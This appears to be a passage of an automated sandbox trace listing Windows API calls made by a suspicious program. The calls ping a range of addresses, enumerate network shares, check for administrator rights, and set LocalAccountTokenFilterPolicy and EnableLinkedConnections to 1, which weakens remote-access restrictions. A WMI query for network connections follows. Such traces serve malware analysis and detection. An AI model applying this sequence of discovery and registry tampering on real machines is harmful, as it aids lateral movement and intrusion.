[0216.189] LocalFree (hMem=0x6170048) returned 0x0 [0216.189] IcmpCreateFile () returned 0x78a4b0 [0216.190] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0216.190] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7762b8 [0216.190] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0xfc0000e0, RequestData=0x7762b8, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x0 [0221.490] LocalFree (hMem=0x7762b8) returned 0x0 [0221.490] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 [0221.492] LocalFree (hMem=0x6170048) returned 0x0 [0221.492] IcmpCreateFile () returned 0x78a4b0 [0221.494] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0221.494] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7762b8 [0221.494] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0xfaffffef, RequestData=0x7762b8, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x0 [0226.479] LocalFree (hMem=0x7762b8) returned 0x0 [0226.480] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 [0226.481] LocalFree (hMem=0x6170048) returned 0x0 [0226.481] IcmpCreateFile () returned 0x78a4b0 [0226.483] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0226.483] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7762b8 [0226.483] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0xffffffff, RequestData=0x7762b8, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x0 [0231.488] LocalFree (hMem=0x7762b8) returned 0x0 [0231.489] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 [0231.490] LocalFree (hMem=0x6170048) returned 0x0 [0231.535] WNetOpenEnumA (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x26e7f0, lphEnum=0x26e890 | out: lphEnum=0x26e890*=0x6d28a8) returned 0x0 [0231.553] WNetEnumResourceA (in: hEnum=0x6d28a8, lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894 | out: lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894) returned 0x0 [0231.553] LocalAlloc (uFlags=0x0, uBytes=0x4000) returned 0x6170048 [0231.553] CoTaskMemAlloc (cb=0x38) returned 0x6d28e8 [0231.553] CoTaskMemAlloc (cb=0x38) returned 0x6d2928 [0231.553] WNetOpenEnumA (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x26e7bc, lphEnum=0x26e85c | out: lphEnum=0x26e85c*=0x77cc30) returned 0x0 [0231.558] CoTaskMemFree (pv=0x6d28e8) [0231.558] CoTaskMemFree (pv=0x6d2928) [0231.558] WNetEnumResourceA (in: hEnum=0x77cc30, lpcCount=0x26e858, lpBuffer=0x6170048, lpBufferSize=0x26e860 | out: lpcCount=0x26e858, lpBuffer=0x6170048, lpBufferSize=0x26e860) returned 0x103 [0231.562] WNetCloseEnum (hEnum=0x77cc30) returned 0x0 [0231.562] LocalFree (hMem=0x6170048) returned 0x0 [0231.562] WNetEnumResourceA (in: hEnum=0x6d28a8, lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894 | out: lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894) returned 0x0 [0231.562] LocalAlloc (uFlags=0x0, uBytes=0x4000) returned 0x6170048 [0231.562] CoTaskMemAlloc (cb=0x34) returned 0x6d2928 [0231.562] CoTaskMemAlloc (cb=0x34) returned 0x6d28e8 [0231.562] WNetOpenEnumA (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x26e7bc, lphEnum=0x26e85c | out: lphEnum=0x26e85c*=0x0) returned 0x4b8 [0243.813] CoTaskMemFree (pv=0x6d2928) [0243.813] CoTaskMemFree (pv=0x6d28e8) [0243.813] LocalFree (hMem=0x6170048) returned 0x0 [0243.813] WNetEnumResourceA (in: hEnum=0x6d28a8, lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894 | out: lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894) returned 0x0 [0243.813] LocalAlloc (uFlags=0x0, uBytes=0x4000) returned 0x6170048 [0243.813] CoTaskMemAlloc (cb=0x26) returned 0x700f08 [0243.814] CoTaskMemAlloc (cb=0x26) returned 0x700cf8 [0243.814] WNetOpenEnumA (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x26e7bc, lphEnum=0x26e85c | out: lphEnum=0x26e85c*=0x0) returned 0x4c6 [0243.816] CoTaskMemFree (pv=0x700f08) [0243.816] CoTaskMemFree (pv=0x700cf8) [0243.816] LocalFree (hMem=0x6170048) returned 0x0 [0243.816] WNetEnumResourceA (in: hEnum=0x6d28a8, lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894 | out: lpcCount=0x26e88c, lpBuffer=0x61851c0, lpBufferSize=0x26e894) returned 0x103 [0243.816] WNetCloseEnum (hEnum=0x6d28a8) returned 0x0 [0243.816] LocalFree (hMem=0x61851c0) returned 0x0 [0243.902] GetCurrentProcess () returned 0xffffffff [0243.902] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e848 | out: TokenHandle=0x26e848*=0x410) returned 1 [0243.902] GetTokenInformation (in: TokenHandle=0x410, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26e848 | out: TokenInformation=0x0, ReturnLength=0x26e848) returned 0 [0243.902] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x768008 [0243.902] GetTokenInformation (in: TokenHandle=0x410, TokenInformationClass=0x8, TokenInformation=0x768008, TokenInformationLength=0x4, ReturnLength=0x26e848 | out: TokenInformation=0x768008, ReturnLength=0x26e848) returned 1 [0243.903] LocalFree (hMem=0x768008) returned 0x0 [0243.903] DuplicateTokenEx (in: hExistingToken=0x410, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26e850 | out: phNewToken=0x26e850*=0x420) returned 1 [0243.903] CheckTokenMembership (in: TokenHandle=0x420, SidToCheck=0x6df1894*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26e860 | out: IsMember=0x26e860) returned 1 [0243.903] CloseHandle (hObject=0x420) returned 1 [0243.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e874 | out: phkResult=0x26e874*=0x420) returned 0x0 [0243.904] RegQueryValueExW (in: hKey=0x420, lpValueName="LocalAccountTokenFilterPolicy", lpReserved=0x0, lpType=0x26e878, lpData=0x0, lpcbData=0x26e874*=0x0 | out: lpType=0x26e878*=0x0, lpData=0x0, lpcbData=0x26e874*=0x0) returned 0x2 [0243.905] RegSetValueExW (in: hKey=0x420, lpValueName="LocalAccountTokenFilterPolicy", Reserved=0x0, dwType=0x4, lpData=0x26e894*=0x1, cbData=0x4 | out: lpData=0x26e894*=0x1) returned 0x0 [0243.910] RegQueryValueExW (in: hKey=0x420, lpValueName="EnableLinkedConnections", lpReserved=0x0, lpType=0x26e878, lpData=0x0, lpcbData=0x26e874*=0x0 | out: lpType=0x26e878*=0x0, lpData=0x0, lpcbData=0x26e874*=0x0) returned 0x2 [0243.910] RegSetValueExW (in: hKey=0x420, lpValueName="EnableLinkedConnections", Reserved=0x0, dwType=0x4, lpData=0x26e894*=0x1, cbData=0x4 | out: lpData=0x26e894*=0x1) returned 0x0 [0243.911] RegCloseKey (hKey=0x420) returned 0x0 [0243.912] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e86c | out: puCount=0x26e86c*=0x2) returned 0x0 [0243.912] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e868*=0x0, pszText=0x0 | out: puBuffLength=0x26e868*=0xf, pszText=0x0) returned 0x0 [0243.912] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e868*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e868*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0243.913] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7f8 | out: ppv=0x26e7f8*=0x6ded34) returned 0x0 [0243.914] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f0 | out: pAptType=0x26e7f0*=1) returned 0x0 [0243.914] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f4 | out: ppvObject=0x26e7f4*=0x0) returned 0x80004002 [0243.914] IUnknown:Release (This=0x6ded34) returned 0x1 [0243.915] CoGetClassObject (in: rclsid=0x700854*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e418 | out: ppv=0x26e418*=0x521fb08) returned 0x0 [0243.916] WbemLocator:IUnknown:QueryInterface (in: This=0x521fb08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e630 | out: ppvObject=0x26e630*=0x0) returned 0x80004002 [0243.916] WbemLocator:IClassFactory:CreateInstance (in: This=0x521fb08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e644 | out: ppvObject=0x26e644*=0x5223608) returned 0x0 [0243.916] WbemLocator:IUnknown:Release (This=0x521fb08) returned 0x0 [0243.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e264 | out: ppvObject=0x26e264*=0x5223608) returned 0x0 [0243.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e220 | out: ppvObject=0x26e220*=0x0) returned 0x80004002 [0243.916] WbemLocator:IUnknown:AddRef (This=0x5223608) returned 0x3 [0243.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26db7c | out: ppvObject=0x26db7c*=0x0) returned 0x80004002 [0243.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26db2c | out: ppvObject=0x26db2c*=0x0) returned 0x80004002 [0243.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26db38 | out: ppvObject=0x26db38*=0x0) returned 0x80004002 [0243.916] CoGetContextToken (in: pToken=0x26db98 | out: pToken=0x26db98) returned 0x0 [0243.917] CoGetContextToken (in: pToken=0x26dfa0 | out: pToken=0x26dfa0) returned 0x0 [0243.917] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e030 | out: ppvObject=0x26e030*=0x0) returned 0x80004002 [0243.917] WbemLocator:IUnknown:Release (This=0x5223608) returned 0x2 [0243.917] WbemLocator:IUnknown:Release (This=0x5223608) returned 0x1 [0243.917] CoGetContextToken (in: pToken=0x26e610 | out: pToken=0x26e610) returned 0x0 [0243.917] CoGetContextToken (in: pToken=0x26e570 | out: pToken=0x26e570) returned 0x0 [0243.917] WbemLocator:IUnknown:QueryInterface (in: This=0x5223608, riid=0x26e640*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e63c | out: ppvObject=0x26e63c*=0x5223608) returned 0x0 [0243.917] WbemLocator:IUnknown:AddRef (This=0x5223608) returned 0x3 [0243.917] WbemLocator:IUnknown:Release (This=0x5223608) returned 0x2 [0243.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7d4 | out: puCount=0x26e7d4*=0x2) returned 0x0 [0243.917] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=8, puBuffLength=0x26e7d0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7d0*=0xf, pszText=0x0) returned 0x0 [0243.917] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=8, puBuffLength=0x26e7d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0243.917] CoCreateInstance (in: rclsid=0x75241284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x752412e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x26e6ac | out: ppv=0x26e6ac*=0x52235f8) returned 0x0 [0243.918] WbemLocator:IWbemLocator:ConnectServer (in: This=0x52235f8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x26e740 | out: ppNamespace=0x26e740*=0x521095c) returned 0x0 [0243.936] WbemLocator:IUnknown:QueryInterface (in: This=0x521095c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5dc | out: ppvObject=0x26e5dc*=0x74035c) returned 0x0 [0243.936] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x74035c, pProxy=0x521095c, pAuthnSvc=0x26e62c, pAuthzSvc=0x26e628, pServerPrincName=0x26e620, pAuthnLevel=0x26e624, pImpLevel=0x26e614, pAuthInfo=0x26e618, pCapabilites=0x26e61c | out: pAuthnSvc=0x26e62c*=0xa, pAuthzSvc=0x26e628*=0x0, pServerPrincName=0x26e620, pAuthnLevel=0x26e624*=0x6, pImpLevel=0x26e614*=0x2, pAuthInfo=0x26e618, pCapabilites=0x26e61c*=0x1) returned 0x0 [0243.936] WbemLocator:IUnknown:Release (This=0x74035c) returned 0x1 [0243.937] WbemLocator:IUnknown:QueryInterface (in: This=0x521095c, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5d0 | out: ppvObject=0x26e5d0*=0x74037c) returned 0x0 [0243.937] WbemLocator:IUnknown:QueryInterface (in: This=0x521095c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5cc | out: ppvObject=0x26e5cc*=0x74035c) returned 0x0 [0243.937] WbemLocator:IClientSecurity:SetBlanket (This=0x74035c, pProxy=0x521095c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0243.937] WbemLocator:IUnknown:Release (This=0x74035c) returned 0x2 [0243.937] WbemLocator:IUnknown:Release (This=0x74037c) returned 0x1 [0243.937] CoTaskMemFree (pv=0x700f08) [0243.937] WbemLocator:IUnknown:Release (This=0x52235f8) returned 0x0 [0243.937] WbemLocator:IUnknown:QueryInterface (in: This=0x521095c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e1cc | out: ppvObject=0x26e1cc*=0x74037c) returned 0x0 [0243.937] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e188 | out: ppvObject=0x26e188*=0x0) returned 0x80004002 [0243.938] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dfa4 | out: ppvObject=0x26dfa4*=0x0) returned 0x80004002 [0243.938] WbemLocator:IUnknown:AddRef (This=0x74037c) returned 0x3 [0243.938] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26dae4 | out: ppvObject=0x26dae4*=0x0) returned 0x80004002 [0243.939] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26da94 | out: ppvObject=0x26da94*=0x0) returned 0x80004002 [0243.939] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26daa0 | out: ppvObject=0x26daa0*=0x7402dc) returned 0x0 [0243.939] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7402dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26daa8 | out: pCid=0x26daa8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0243.939] WbemLocator:IUnknown:Release (This=0x7402dc) returned 0x3 [0243.939] CoGetContextToken (in: pToken=0x26db00 | out: pToken=0x26db00) returned 0x0 [0243.939] CoGetContextToken (in: pToken=0x26df08 | out: pToken=0x26df08) returned 0x0 [0243.939] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26df98 | out: ppvObject=0x26df98*=0x740364) returned 0x0 [0243.940] WbemLocator:IRpcOptions:Query (in: This=0x740364, pPrx=0x74037c, dwProperty=2, pdwValue=0x26dfc0 | out: pdwValue=0x26dfc0) returned 0x80004002 [0243.940] WbemLocator:IUnknown:Release (This=0x740364) returned 0x3 [0243.940] WbemLocator:IUnknown:Release (This=0x74037c) returned 0x2 [0243.940] CoGetContextToken (in: pToken=0x26e4e0 | out: pToken=0x26e4e0) returned 0x0 [0243.940] CoGetContextToken (in: pToken=0x26e440 | out: pToken=0x26e440) returned 0x0 [0243.940] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x26e510*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x26e50c | out: ppvObject=0x26e50c*=0x521095c) returned 0x0 [0243.940] WbemLocator:IUnknown:AddRef (This=0x521095c) returned 0x4 [0243.940] WbemLocator:IUnknown:Release (This=0x521095c) returned 0x3 [0243.940] WbemLocator:IUnknown:Release (This=0x521095c) returned 0x2 [0243.940] SysStringLen (param_1=0x0) returned 0x0 [0243.940] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0243.940] WbemLocator:IUnknown:AddRef (This=0x74037c) returned 0x3 [0243.940] WbemLocator:IUnknown:QueryInterface (in: This=0x74037c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e36c | out: ppvObject=0x26e36c*=0x74037c) returned 0x0 [0243.941] WbemLocator:IUnknown:Release (This=0x74037c) returned 0x3 [0243.941] WbemLocator:IUnknown:Release (This=0x74037c) returned 0x2 [0243.941] CoGetContextToken (in: pToken=0x26e5c0 | out: pToken=0x26e5c0) returned 0x0 [0243.941] WbemLocator:IUnknown:AddRef (This=0x521095c) returned 0x3 [0243.941] IWbemServices:ExecQuery (in: This=0x521095c, strQueryLanguage="WQL", strQuery="select * from Win32_NetworkConnection", lFlags=16, pCtx=0x0, ppEnum=0x26e7dc | out: ppEnum=0x26e7dc*=0x521089c) returned 0x0 [0243.944] IUnknown:QueryInterface (in: This=0x521089c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e630 | out: ppvObject=0x26e630*=0x52108a0) returned 0x0 [0243.944] IClientSecurity:QueryBlanket (in: This=0x52108a0, pProxy=0x521089c, pAuthnSvc=0x26e680, pAuthzSvc=0x26e67c, pServerPrincName=0x26e674, pAuthnLevel=0x26e678, pImpLevel=0x26e668, pAuthInfo=0x26e66c, pCapabilites=0x26e670 | out: pAuthnSvc=0x26e680*=0xa, pAuthzSvc=0x26e67c*=0x0, pServerPrincName=0x26e674, pAuthnLevel=0x26e678*=0x6, pImpLevel=0x26e668*=0x2, pAuthInfo=0x26e66c, pCapabilites=0x26e670*=0x1) returned 0x0 [0243.944] IUnknown:Release (This=0x52108a0) returned 0x1 [0243.944] IUnknown:QueryInterface (in: This=0x521089c, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e624 | out: ppvObject=0x26e624*=0x73ffbc) returned 0x0 [0243.944] IUnknown:QueryInterface (in: This=0x521089c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e620 | out: ppvObject=0x26e620*=0x52108a0) returned 0x0 [0243.944] IClientSecurity:SetBlanket (This=0x52108a0, pProxy=0x521089c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0243.946] IUnknown:Release (This=0x52108a0) returned 0x2 [0243.946] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x1 [0243.946] CoTaskMemFree (pv=0x700cf8) [0243.946] IUnknown:QueryInterface (in: This=0x521089c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e21c | out: ppvObject=0x26e21c*=0x73ffbc) returned 0x0 [0243.947] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e1d8 | out: ppvObject=0x26e1d8*=0x0) returned 0x80004002 [0243.947] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dff4 | out: ppvObject=0x26dff4*=0x0) returned 0x80004002 [0243.948] WbemLocator:IUnknown:AddRef (This=0x73ffbc) returned 0x3 [0243.948] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26db34 | out: ppvObject=0x26db34*=0x0) returned 0x80004002 [0243.948] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26dae4 | out: ppvObject=0x26dae4*=0x0) returned 0x80004002 [0243.948] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26daf0 | out: ppvObject=0x26daf0*=0x73ff1c) returned 0x0 [0243.948] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x73ff1c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26daf8 | out: pCid=0x26daf8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 